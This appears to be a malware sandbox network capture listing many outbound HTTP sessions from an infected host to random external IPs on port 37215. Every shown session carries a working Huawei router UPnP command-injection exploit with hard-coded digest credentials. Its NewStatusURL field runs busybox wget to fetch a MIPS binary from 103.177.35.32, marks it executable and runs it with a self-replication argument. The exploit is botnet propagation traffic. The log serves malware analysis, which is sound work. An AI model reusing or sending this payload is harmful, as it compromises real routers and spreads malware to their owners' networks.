                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2886192.168.2.234317841.49.77.12437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.655663967 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2887192.168.2.2358910137.76.45.8437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.655669928 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2888192.168.2.2360186183.79.28.15337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.655677080 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2889192.168.2.2333716197.109.20.25437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.655791044 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2890192.168.2.2336106197.9.17.2237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.656131983 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2891192.168.2.233601441.145.67.5437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.656246901 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2892192.168.2.2344238197.112.45.7337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.656321049 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2893192.168.2.233842641.163.161.12137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.656491995 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2894192.168.2.2354570197.78.230.13337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.656508923 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2895192.168.2.2355892197.38.239.9437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.656529903 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
